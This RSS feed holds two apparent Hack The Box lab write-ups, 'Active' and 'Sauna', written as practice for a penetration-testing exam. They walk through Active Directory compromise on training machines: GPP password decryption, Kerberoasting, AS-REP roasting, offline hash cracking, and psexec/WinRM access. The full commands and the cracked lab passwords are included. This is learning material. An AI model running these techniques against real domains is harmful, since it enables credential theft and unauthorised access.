<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:dc="http://purl.org/dc/elements/1.1/">
  <channel>
    <title>DEV Community: Jung</title>
    <description>The latest articles on DEV Community by Jung (@zkrnvkf).</description>
    <link>https://dev.to/zkrnvkf</link>
    <image>
      <url>https://media2.dev.to/dynamic/image/width=90,height=90,fit=cover,gravity=auto,format=auto/https:%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F3575358%2F874c744a-5cef-4de1-9983-de5d614e35ac.jpg</url>
      <title>DEV Community: Jung</title>
      <link>https://dev.to/zkrnvkf</link>
    </image>
    <atom:link rel="self" type="application/rss+xml" href="https://dev.to/feed/zkrnvkf"/>
    <language>en</language>
    <item>
      <title>HTB - Active</title>
      <dc:creator>Jung</dc:creator>
      <pubDate>Fri, 25 Sep 2026 15:03:16 +0000</pubDate>
      <link>https://dev.to/zkrnvkf/htb-active-357h</link>
      <guid>https://dev.to/zkrnvkf/htb-active-357h</guid>
      <description>&lt;p&gt;This is the third HTB machine I’ve attempted while preparing for the TCM PJPT exam. Compared to the Forest and Sauna machines I attempted previously, this machine was much more straightforward and relatively easier. That said, it was still a nice and fun machine to work through, and I picked up a few useful things along the way.&lt;/p&gt;

&lt;p&gt;OS: Window&lt;br&gt;
Difficulty: Easy&lt;/p&gt;

&lt;p&gt;After the nmap enumeration:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight console"&gt;&lt;code&gt;&lt;span class="gp"&gt;└─#&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;nmap &lt;span class="nt"&gt;-T4&lt;/span&gt; &lt;span class="nt"&gt;--min-rate&lt;/span&gt; 5000 &lt;span class="nt"&gt;-p-&lt;/span&gt; &lt;span class="nt"&gt;-sV&lt;/span&gt; &lt;span class="nt"&gt;-sC&lt;/span&gt; 10.129.93.29 
&lt;span class="go"&gt;Starting Nmap 7.99 ( https://nmap.org ) at 2026-09-25 07:06 -0400
Warning: 10.129.93.29 giving up on port because retransmission cap hit (6).
Nmap scan report for 10.129.93.29
Host is up (0.23s latency).
Not shown: 65513 closed tcp ports (reset)
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid: 
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2026-09-25 11:07:13Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5722/tcp  open  msrpc         Microsoft Windows RPC
9389/tcp  open  mc-nmf        .NET Message Framing
49152/tcp open  msrpc         Microsoft Windows RPC
49153/tcp open  msrpc         Microsoft Windows RPC
49154/tcp open  msrpc         Microsoft Windows RPC
49155/tcp open  msrpc         Microsoft Windows RPC
49157/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49158/tcp open  msrpc         Microsoft Windows RPC
49162/tcp open  msrpc         Microsoft Windows RPC
49167/tcp open  msrpc         Microsoft Windows RPC
49169/tcp open  msrpc         Microsoft Windows RPC
&lt;/span&gt;&lt;span class="gp"&gt;Service Info: Host: DC;&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;OS: Windows&lt;span class="p"&gt;;&lt;/span&gt; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows
&lt;span class="go"&gt;
Host script results:
| smb2-time: 
|   date: 2026-09-25T11:08:12
|_  start_date: 2026-09-25T11:04:38
| smb2-security-mode: 
|   2.1: 
|_    Message signing enabled and required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 117.51 seconds
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;From the scan results, we can identify several services and pieces of information that give us a good indication of the target’s role:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;DNS is running, which is commonly used within Active Directory environments for name resolution.&lt;/li&gt;
&lt;li&gt;Kerberos is running, which is a key authentication protocol used by Active Directory.&lt;/li&gt;
&lt;li&gt;LDAP is running, which is commonly used to query and interact with Active Directory directory services.&lt;/li&gt;
&lt;li&gt;The domain name is active.htb&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;The combination of Kerberos, LDAP, and DNS, along with the presence of an Active Directory domain, is a strong indicator that this machine is a Domain Controller (DC).&lt;/p&gt;

&lt;p&gt;I first tried to enumerate the Active Directory environment using anonymous LDAP enumeration with windapsearch. However, the LDAP bind failed, and the output indicated that a successful bind must be completed on the connection.&lt;/p&gt;

&lt;p&gt;This suggests that the target does not allow anonymous LDAP binding, meaning we cannot query LDAP without first authenticating with valid credentials.&lt;br&gt;
&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fkvoqmm3qpqz1eeomf9fi.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fkvoqmm3qpqz1eeomf9fi.png" alt=" " width="" height=""&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;From the Nmap enumeration, we can see that port 445 (SMB) is open. This gives us an opportunity to enumerate the SMB shares available on the target and check whether any of them can be accessed anonymously.&lt;/p&gt;

&lt;p&gt;After enumerating the available shares, we found that the Replication share allows anonymous access.&lt;/p&gt;

&lt;p&gt;Command: &lt;code&gt;smbclient //{target ip}/Replication -N&lt;/code&gt;&lt;br&gt;
&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fc3xsyt36ahk2g427t2f6.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fc3xsyt36ahk2g427t2f6.png" alt=" " width="" height=""&gt;&lt;/a&gt;&lt;br&gt;
&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2F8spgoo21oesvznsz936n.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2F8spgoo21oesvznsz936n.png" alt=" " width="" height=""&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;After navigating through the SMB share, we reach:&lt;/p&gt;

&lt;p&gt;&lt;code&gt;smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;Here, we find a file named &lt;strong&gt;Groups.xml&lt;/strong&gt;. &lt;/p&gt;

&lt;p&gt;Some information about GPP file:&lt;br&gt;
Microsoft patched the underlying Group Policy Preferences (GPP) password-storage vulnerability in 2014, and newer GPP deployments should no longer create new exploitable cPassword credentials. However, older GPP configurations can still contain these stored credentials.&lt;/p&gt;

&lt;p&gt;From our Nmap enumeration, we can see that the DNS service identifies the target as Microsoft DNS 6.1.7601, running on Windows Server 2008 R2 SP1:&lt;/p&gt;

&lt;p&gt;&lt;code&gt;53/tcp    open  domain    Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;This suggests that we are dealing with an older Windows environment, so finding a Groups.xml file under the Group Policy Preferences directory is worth investigating. There is a possibility that this is a legacy GPP configuration containing a cPassword.&lt;/p&gt;

&lt;p&gt;Given its location and the age of the target environment, we should inspect the file for any stored credentials or cPassword values.&lt;/p&gt;

&lt;p&gt;We can use the get command to download Groups.xml to our Kali machine for further analysis.&lt;br&gt;
&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fl6c1vokxoovjgxb5ab36.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fl6c1vokxoovjgxb5ab36.png" alt=" " width="800" height="400"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;After opening the Groups.xml file in Firefox, we can see that it contains credentials for a service account:&lt;/p&gt;

&lt;p&gt;Username:active.htb/SVC_TGS&lt;br&gt;
cPassword: edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ&lt;/p&gt;

&lt;p&gt;The cPassword value is the encrypted password stored by Group Policy Preferences (GPP).&lt;br&gt;
&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2F2hxfghnsmgkga12k4m65.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2F2hxfghnsmgkga12k4m65.png" alt=" " width="" height=""&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;We can use gpp-decrypt to decrypt the cPassword value we found in Groups.xml:&lt;/p&gt;

&lt;p&gt;&lt;code&gt;gpp-decrypt &amp;lt;cPassword&amp;gt;&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;Running the command reveals the plaintext password for the SVC_TGS service account:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;GPPstillStandingStrong2k18&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;We now have valid credentials for the SVC_TGS account, so I tried using impacket-psexec to obtain a remote shell as this user.&lt;/p&gt;

&lt;p&gt;However, the attempt was unsuccessful. The output indicated that none of the available SMB shares were writable.&lt;br&gt;
&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2F23wkmjucjtmc5gxhrkax.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2F23wkmjucjtmc5gxhrkax.png" alt=" " width="" height=""&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;This is important because psexec typically needs to upload a service executable to a writable administrative share, such as ADMIN$, in order to execute commands remotely. &lt;/p&gt;

&lt;p&gt;To put it simply, psexec works by creating a Windows service remotely, and to do that it needs a way to place the service executable on the target machine and thus, requiring writable access.&lt;/p&gt;

&lt;p&gt;Since the SVC_TGS account does not have the required write access, psexec cannot use this method to obtain a shell. &lt;/p&gt;

&lt;p&gt;Since SVC_TGS does not have the required permissions to use psexec, the next step is to identify which SMB shares the account can access and what level of access it has.&lt;/p&gt;

&lt;p&gt;To enumerate the available SMB shares and check the permissions of the SVC_TGS account, I used NetExec (NXC):&lt;/p&gt;

&lt;p&gt;&lt;code&gt;nxc smb 10.129.93.33 -u 'SVC_TGS' -p 'GPPstillStandingStrong2k18' --shares&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;The --shares option enumerates the SMB shares available on the target and shows the access level that the provided account has for each share, such as READ or WRITE permissions.&lt;/p&gt;

&lt;p&gt;This allows us to identify shares that the SVC_TGS account can read and potentially investigate for additional information or credentials.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2F4rtc82e2habf3r9e56yg.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2F4rtc82e2habf3r9e56yg.png" alt=" " width="" height=""&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;From the output, we can see several SMB shares that the SVC_TGS account has READ access to. Among them, I was particularly interested in the Users share, as user-specific directories are often a good place to look for user-related files, including the user flag in an HTB machine.&lt;/p&gt;

&lt;p&gt;I used smbclient to connect to the Users share using the SVC_TGS credentials:&lt;/p&gt;

&lt;p&gt;&lt;code&gt;smbclient //10.129.93.33/Users -U 'SVC_TGS'&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;After connecting, I navigated to the user’s Desktop, where I was able to retrieve the user flag.&lt;br&gt;
&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Ftks02ppmrqggim60ki6j.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Ftks02ppmrqggim60ki6j.png" alt=" " width="" height=""&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Use the &lt;code&gt;get&lt;/code&gt; command to download the user.txt file and read it to get the flag&lt;/p&gt;

&lt;h3&gt;
  
  
  Privilege Escalation
&lt;/h3&gt;

&lt;p&gt;I started to understand why this machine was labelled as Easy, especially after obtaining the SVC_TGS account. The username itself can be seen as a hint, since TGS is commonly associated with Kerberoasting and the Ticket Granting Service (TGS) in Kerberos authentication.&lt;/p&gt;

&lt;p&gt;Normally, my next step would have been to use BloodHound to enumerate the relationships between domain objects and identify users that could potentially be Kerberoasted, especially if those accounts had interesting privileges or access to higher-privileged groups. However, I decided to skip that step this time because the SVC_TGS username gave me a strong intuition that Kerberoasting was likely to be one of the main attack paths on this machine and I wanted to save time too lol...&lt;/p&gt;

&lt;p&gt;Kerberoasting is a technique where an attacker requests Kerberos service tickets (TGS tickets) for accounts that have a Service Principal Name (SPN) registered. These tickets can then be taken offline and subjected to password cracking. If the associated service account is using a weak or guessable password, this can potentially allow us to recover its plaintext password.&lt;/p&gt;

&lt;p&gt;We can perform Kerberoasting using impacket-GetUserSPNs. Since we already have valid credentials for SVC_TGS, we can use them to query the domain for accounts with registered Service Principal Names (SPNs) and request their Kerberos service tickets:&lt;/p&gt;

&lt;p&gt;&lt;code&gt;impacket-GetUserSPNs active.htb/SVC_TGS:'GPPstillStandingStrong2k18' -dc-ip 10.129.93.33 -request&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;The &lt;code&gt;-request&lt;/code&gt; option tells GetUserSPNs to request the TGS tickets for the accounts it finds. In the output, we received a TGS hash for the &lt;strong&gt;Domain Administrator account&lt;/strong&gt;.&lt;br&gt;
&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2F11gcvk6z8d7r5ghtkjqt.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2F11gcvk6z8d7r5ghtkjqt.png" alt=" " width="" height=""&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;This is significant because the TGS can be taken offline and subjected to password cracking, potentially allowing us to recover the plaintext password for the associated account.&lt;/p&gt;

&lt;p&gt;I saved the TGS hash to a file so that it could be cracked offline using Hashcat.&lt;/p&gt;

&lt;p&gt;After running Hashcat against the TGS hash, we were able to successfully crack it and recover the plaintext password for the Domain Administrator account -&amp;gt; &lt;strong&gt;Ticketmaster1968&lt;/strong&gt; (The mode for cracking TGS Hash is &lt;strong&gt;13100&lt;/strong&gt;)&lt;br&gt;
&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2F21vuysuxsz1sdyzffewk.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2F21vuysuxsz1sdyzffewk.png" alt=" " width="" height=""&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Now that we have valid credentials for the Domain Administrator account, we can use impacket-psexec to obtain a shell on the target machine.&lt;/p&gt;

&lt;p&gt;Unlike the previous attempt with SVC_TGS, the Domain Administrator account has the required privileges to access the necessary administrative resources and create a remote service. This allows psexec to successfully execute commands on the target.&lt;/p&gt;

&lt;p&gt;After obtaining a shell, I navigated to the Administrator’s Desktop, where I was able to retrieve the root flag and complete the machine.&lt;br&gt;
&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fov7zkw99uj9xpiv0ggx8.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fov7zkw99uj9xpiv0ggx8.png" alt=" " width="" height=""&gt;&lt;/a&gt;&lt;/p&gt;

</description>
      <category>cybersecurity</category>
      <category>infosec</category>
      <category>security</category>
    </item>
    <item>
      <title>HTB - Sauna</title>
      <dc:creator>Jung</dc:creator>
      <pubDate>Thu, 24 Sep 2026 18:35:39 +0000</pubDate>
      <link>https://dev.to/zkrnvkf/htb-sauna-2lmn</link>
      <guid>https://dev.to/zkrnvkf/htb-sauna-2lmn</guid>
      <description>&lt;p&gt;This is the second HTB machine I attempted before taking the PJPT exam. If you’ve done the HTB Forest machine before, this one should feel pretty smooth sailing.&lt;/p&gt;

&lt;p&gt;It took me way less time to pwn this machine compared to Forest, probably because I was able to apply a lot of the things I learned from it.&lt;/p&gt;

&lt;p&gt;OS: Windows&lt;br&gt;
Difficulty: Easy&lt;/p&gt;

&lt;p&gt;After nmap enumeration:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight console"&gt;&lt;code&gt;&lt;span class="gp"&gt;└─#&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;nmap &lt;span class="nt"&gt;-T4&lt;/span&gt; &lt;span class="nt"&gt;--min-rate&lt;/span&gt; 5000 &lt;span class="nt"&gt;-p-&lt;/span&gt; &lt;span class="nt"&gt;-sV&lt;/span&gt; &lt;span class="nt"&gt;-sC&lt;/span&gt; 10.129.95.180
&lt;span class="go"&gt;Starting Nmap 7.99 ( https://nmap.org ) at 2026-09-23 13:26 -0400
Nmap scan report for 10.129.95.180
Host is up (0.23s latency).
Not shown: 65515 filtered tcp ports (no-response)
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Egotistical Bank :: Home
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2026-09-24 00:27:27Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
49667/tcp open  msrpc         Microsoft Windows RPC
49673/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49674/tcp open  msrpc         Microsoft Windows RPC
49675/tcp open  msrpc         Microsoft Windows RPC
49688/tcp open  msrpc         Microsoft Windows RPC
49696/tcp open  msrpc         Microsoft Windows RPC
&lt;/span&gt;&lt;span class="gp"&gt;Service Info: Host: SAUNA;&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;OS: Windows&lt;span class="p"&gt;;&lt;/span&gt; CPE: cpe:/o:microsoft:windows
&lt;span class="go"&gt;
Host script results:
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled and required
|_clock-skew: 7h00m00s
| smb2-time: 
|   date: 2026-09-24T00:28:21
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 148.94 seconds
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;From the scan results, we can identify several services and pieces of information that give us a good indication of the target’s role:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;DNS is running, which is commonly used within Active Directory environments for name resolution.&lt;/li&gt;
&lt;li&gt;Kerberos is running, which is a key authentication protocol used by Active Directory.&lt;/li&gt;
&lt;li&gt;LDAP is running, which is commonly used to query and interact with Active Directory directory services.&lt;/li&gt;
&lt;li&gt;The domain name is EGOTISTICAL-BANK.LOCAL&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;The combination of Kerberos, LDAP, and DNS, along with the presence of an Active Directory domain, is a strong indicator that this machine is a Domain Controller (DC).&lt;/p&gt;

&lt;p&gt;I used windapsearch to check whether anonymous LDAP enumeration was allowed on the domain. It was, which meant I could query the LDAP directory without providing credentials.&lt;/p&gt;

&lt;p&gt;This allowed me to enumerate users and other objects present in the Active Directory environment. (I learned about windapsearch while working on the HTB Forest machine, so I knew it was worth trying here as well)&lt;br&gt;
&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2F3q0qhosdk7u55p5gfpok.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2F3q0qhosdk7u55p5gfpok.png" alt=" " width="800" height="661"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;I took the usernames I had enumerated and used impacket-GetNPUsers to check whether any of the accounts had Kerberos pre-authentication disabled.&lt;/p&gt;

&lt;p&gt;If an account has Kerberos pre-authentication disabled, it may be vulnerable to AS-REP Roasting, allowing us to request an AS-REP response for the account and potentially crack the hash offline.&lt;/p&gt;

&lt;p&gt;However, all of my attempts came back with no useful results, so there were no obvious accounts to AS-REP roast. This meant I needed to take a different approach.&lt;/p&gt;

&lt;p&gt;From the Nmap scan, I found that HTTP port 80 was open, which indicated that the domain controller was also hosting a website that I could access.&lt;/p&gt;

&lt;p&gt;I checked the website and found a list of team members under the “About Us” section. This was interesting because the names listed there could potentially correspond to valid user accounts within the Active Directory domain.&lt;br&gt;
&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2F0nz0kx1reujc0ndenc6r.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2F0nz0kx1reujc0ndenc6r.png" alt=" " width="800" height="557"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;I created user.txt file and stored the names of the team members in the following format:&lt;br&gt;
&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2F6ifhbmh853reixqf27y6.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2F6ifhbmh853reixqf27y6.png" alt=" " width="458" height="290"&gt;&lt;/a&gt;&lt;br&gt;
For example, if the person’s name is Fergus Smith, the username would likely be fsmith.&lt;/p&gt;

&lt;p&gt;This is because the Active Directory environment appears to follow a common username naming convention: the first letter of the user’s last name is combined with their first name.&lt;/p&gt;

&lt;p&gt;I then ran impacket-GetNPUsers again using my newly created user.txt file. This time, I found that the fsmith account was vulnerable to AS-REP Roasting.&lt;br&gt;
&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2F4cwbwzmy3vwk183neazm.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2F4cwbwzmy3vwk183neazm.png" alt=" " width="798" height="148"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Next, I used Hashcat to crack the AS-REP hash that I obtained earlier. After successfully cracking the hash, I was able to retrieve the password for the fsmith account.&lt;br&gt;
&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Ftsukwjpawxja9jiwjlvm.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Ftsukwjpawxja9jiwjlvm.png" alt=" " width="800" height="499"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;From the Nmap enumeration, I also found that port 5985 was open, which is the default port used by Windows Remote Management (WinRM) over HTTP.&lt;/p&gt;

&lt;p&gt;Since I now had valid credentials for the fsmith account, I could use Evil-WinRM to authenticate to the machine remotely.&lt;/p&gt;

&lt;p&gt;After gaining access, I navigated to the fsmith user’s Desktop and found the user flag.&lt;br&gt;
&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fxsiblci5a9fp8um7o6q4.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fxsiblci5a9fp8um7o6q4.png" alt=" " width="800" height="322"&gt;&lt;/a&gt;&lt;/p&gt;

